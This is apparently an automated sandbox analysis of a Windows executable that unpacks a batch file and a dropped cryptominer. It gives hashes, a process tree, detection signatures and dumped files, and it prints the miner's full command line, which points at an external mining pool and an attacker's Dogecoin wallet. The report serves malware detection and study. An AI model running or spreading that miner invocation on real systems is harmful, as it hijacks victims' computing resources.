73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
23/02/2024, 05:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2496	b2e.exe
4708	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1484-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1484 wrote to memory of 2496	1484	batexe.exe	73
PID 1484 wrote to memory of 2496	1484	batexe.exe	73
PID 1484 wrote to memory of 2496	1484	batexe.exe	73
PID 2496 wrote to memory of 4036	2496	b2e.exe	74
PID 2496 wrote to memory of 4036	2496	b2e.exe	74
PID 2496 wrote to memory of 4036	2496	b2e.exe	74
PID 4036 wrote to memory of 4708	4036	cmd.exe	77
PID 4036 wrote to memory of 4708	4036	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1484
- C:\Users\Admin\AppData\Local\Temp\FE65.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\FE65.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\FE65.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\431.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\431.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FE65.tmp\b2e.exe

Filesize
768KB

MD5
41acb3c7c35169437c8e50c36e39f5a5

SHA1
6b7a95c8fb404247edb7430b46e931495eeba0d1

SHA256
77003c5f07279f31ace3879feb99ce0568a05bc7bc56ecd5707bc0581cb6016a

SHA512
670b258078f3ccd9e3e710a994d95d406094dab87b4e4e11e3b312a7883631877ea896bc53150cb8b9bb8a0500df129005973212fce0541978df505edbe7d145

Download Submit
C:\Users\Admin\AppData\Local\Temp\FE65.tmp\b2e.exe

Filesize
4.0MB

MD5
fff2e8f5a28a1a86fd6239ca1852c43e

SHA1
c8e00eace4bc6e56302f441fe72ca2eb96a7f58f

SHA256
fb6ff98f7d9f787e835dfe8c0347f1c05fcc5d147f9537495100a9e2bde37b55

SHA512
ff668b140ad59e3657a37ba255b13c7a0b5e0b1bf2a6d2d7cd69ecbc69298fb5f94573d31f60223d1d7d3c37a751728269cb694da8d719ee80d60702c1a1aa4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
641KB

MD5
87a1f895351ad77084a6fc8e09db0641

SHA1
4557518b9583f60c3e420511bda287ae13be218d

SHA256
429219f14eb615bebd2efbfac1b6b18fdb4a5313980359b93eb7da781e43348e

SHA512
a2ce045f33f11f19372c498202c2891dc407738f7f7ad95bd0315517d4fcf2f7ee36cdeee44014fced6610d501b6feddc4f425bb9723e3422b8903ed5d74a25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
641KB

MD5
34fcd067adad1c156af56723b9509efa

SHA1
792f440a2875e8466c0c0bd17b4d8a316f572a94

SHA256
b37063d52c4e2566622e054a87ac25b567688809d7402fe05f50593ba5c8e1c9

SHA512
4bf7c3c640193d77189075bc77c1953bcaa2d50793d0af607e1a76c326a4ed01a02e5b57e878598c490fd547d92a7f7b1294ef6f59ea3c27fdf6b8c7c72901cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
768KB

MD5
e3f15c79f945604229fa814f57c79274

SHA1
19a7015dfbe622ab86c48693ee1605b26112a3fa

SHA256
7b09ee53447ccf77a0f2d7bfe25908f963d681433d3cba5a16c7f45646c42175

SHA512
12dc1df8a947caee13a12eca5a976feffd7408402b0495e4971d4bd7181e8d353ebc17da044d2ce6d1c273bb05a0ca5ddf7492394b355786d8b14b0997de162c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
2d4811c94cecd0147c295958970c0490

SHA1
3e83f80477824504c87802dcdd67000ebfa26eab

SHA256
79bede3ce001bd4e7420acd7b2d3dbb80964f55558fc59c3a810017c36b91ed3

SHA512
7295cd95ab6fd6be6be7744e4f49029243301402e76ed69aea4769c9088c42feac70852eb04324bbebdbc9fb9eababe1c92f4ee412bf7096a03da8fab473e986

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
706KB

MD5
cd19c9aa7b044a78d5dabc6ae6734d98

SHA1
d891de340720a71901c5f555c55353e20f85c308

SHA256
0d6663b4d107d92bdeac790a50b677b30408b9a24e3d17bd0b38a931d301a2e2

SHA512
0627e242198b9c98c7857b05992c0e1e8f2c40c090a328e6e81f20e867026ae9f1cf8e838a786d012eb89ec7b1e4fb390a7030d8fcb1a90e1b80a0609470a08f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
605KB

MD5
b98c59b2d12ddc122e3d6e3259daacc5

SHA1
7168659347df644e4b24dfdaa8943c658a7bcb82

SHA256
792e4fd87ea06dbed48fbcbf2d069894bb399c189baeaa5af6ec80939ea4907c

SHA512
4b4b2198ede5f1d32679d0983679f5ed4cd6dbcae2d7ac925f1644a95f622a8539e5cc0d5dda782ca84f35fe5391a680791e79744bc868bb23242805c4aa252c

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
748KB

MD5
c6eaa9ba46f1b2bf509e57c6466e0007

SHA1
c327336b6783a3995322a005e3f2f2f38cbbdbd7

SHA256
df1127450443a2a2a557ef3b18dc509d56223a50250bf8166926e7d084206453

SHA512
b0efbb27f914bde039ec69e07f73492a9af96fd19cc0ad597e563df5a8aa50b7be907395504e93cb59ff3389292f7d71606f1541f1b9216f896186e04e356596

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
492KB

MD5
6c3520acf8afbbd8882ea106af670e8b

SHA1
e17e54d71e9fa726c7971e591f975b2b7fafa825

SHA256
c23a77eeb00121b8c84ec34052f47939075ae413fce704112eabab85409367f8

SHA512
9b39f9953eda0fcc32db9fdffa183843e8fa26cb25fce8b188b712eeb5c25046c014597bff6f6063211254e68072584aad2118e2e5254a7e6d49deab02628dd2

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
489KB

MD5
80331454bd865353e6bfcb8bfe930029

SHA1
bead90cea1153c8ebf8ff5de8afeee108f363f55

SHA256
c533707ac77734afe980c617c2cce5bc911dbf0afbed7bacce4fd16c2c97f756

SHA512
9a6f351b125c1f1bae4cba50f817a05a736ebfb837c108278e41d849c1b08c46ffbe8ead58d0e489cbfb5f2030533702bbc0b37caadc3117b1a3e837a52d347c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
571KB

MD5
acec20c91335ced256f5fae71e4d9cc3

SHA1
4778747d229aea7ff141227a386dbb7d604744cc

SHA256
212e0d1528b657f1e62f0c73c043aecc1205043c1688f6ee3c32a04e8427622d

SHA512
672664272e914bb58922321a4c12a48e07a41d3e6aa5a33a0b1e863c8dd55051fc44ed7ee524b08e2652ff88d096c6d6d55ff0b72565a5146f4cd3aecda205ce

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1484-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2496-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2496-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4708-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4708-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4708-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-44-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/4708-43-0x00000000660A0000-0x0000000066138000-memory.dmp

Filesize
608KB

Download
memory/4708-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download